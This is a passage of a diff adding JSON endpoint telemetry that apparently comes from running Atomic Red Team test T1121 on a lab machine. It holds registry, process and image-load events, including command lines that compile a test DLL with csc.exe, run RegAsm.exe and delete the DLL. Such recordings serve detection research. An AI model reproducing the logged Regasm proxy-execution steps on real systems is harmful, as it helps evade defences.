"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570869020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"del T1121.dll\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 3428, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883570869070000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010476B4D01}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3428, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570869020000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010476B4D01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3428, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570869020000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010476B4D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3428, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570869020000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010476B4D01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3428, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570869020000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010476B4D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + 
"pid": 3428, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570869020000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010476B4D01}" + }, + { + "event_type": "process", + "pid": 3428, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883570869180000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010476B4D01}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 5836, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883570869260000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010656C4D01}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5836, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570869180000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010656C4D01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5836, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570869180000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010656C4D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5836, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570869180000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010656C4D01}" + }, + { + 
"event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5836, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570869180000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010656C4D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5836, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570869180000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010656C4D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570869180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "clr.dll", + "image_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570866060016, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570869180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570869180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570869180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570869180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570869180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 
131883570869180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570869180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570869180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570869180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570869180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + 
"registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570869180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570869340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570869340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570869340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570869340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570869340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570869340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570869340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570869340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570869340000, 
+ "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570869340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570869340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570869340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "process", + "pid": 5836, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883570869340000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010656C4D01}" + }, + { + "event_type": "file", + "file_name": "key.snk", + "file_path": "C:\\eqllib\\atomic-red-team-master\\atomics\\key.snk", + "pid": 7036, + "process_name": "powershell.exe", + "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "timestamp": 131883570869810016, + "unique_pid": 
"{42FC7E13-C11D-5C05-0000-0010C6E90401}" + }, + { + "command_line": "\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe\" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\\AtomicRedTeam\\atomics\\T1121\\src\\T1121.cs", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 7696, + "ppid": 7036, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "subtype": "create", + "timestamp": 131883570869860000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "csc.exe", + "image_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869810016, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869810016, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\SysWOW64\\ntdll.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869810016, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "wow64.dll", + "image_path": "C:\\Windows\\System32\\wow64.dll", + "pid": 7696, + 
"process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869810016, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "wow64win.dll", + "image_path": "C:\\Windows\\System32\\wow64win.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869810016, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869810016, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\SysWOW64\\kernel32.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869810016, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869960000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "wow64cpu.dll", + "image_path": "C:\\Windows\\System32\\wow64cpu.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869960000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": 
"C:\\Windows\\SysWOW64\\kernel32.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869960000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\SysWOW64\\KernelBase.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869960000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\SysWOW64\\advapi32.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869960000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\SysWOW64\\msvcrt.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869960000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\SysWOW64\\sechost.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869960000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\SysWOW64\\rpcrt4.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869960000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + 
"image_name": "sspicli.dll", + "image_path": "C:\\Windows\\SysWOW64\\sspicli.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869960000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "cryptbase.dll", + "image_path": "C:\\Windows\\SysWOW64\\cryptbase.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869960000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\SysWOW64\\bcryptprimitives.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869960000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "ole32.dll", + "image_path": "C:\\Windows\\SysWOW64\\ole32.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869960000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\SysWOW64\\combase.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869960000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\SysWOW64\\ucrtbase.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869960000, + "unique_pid": 
"{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\SysWOW64\\gdi32.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869960000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\SysWOW64\\gdi32full.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869960000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\SysWOW64\\msvcp_win.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869960000, + "unique_pid": 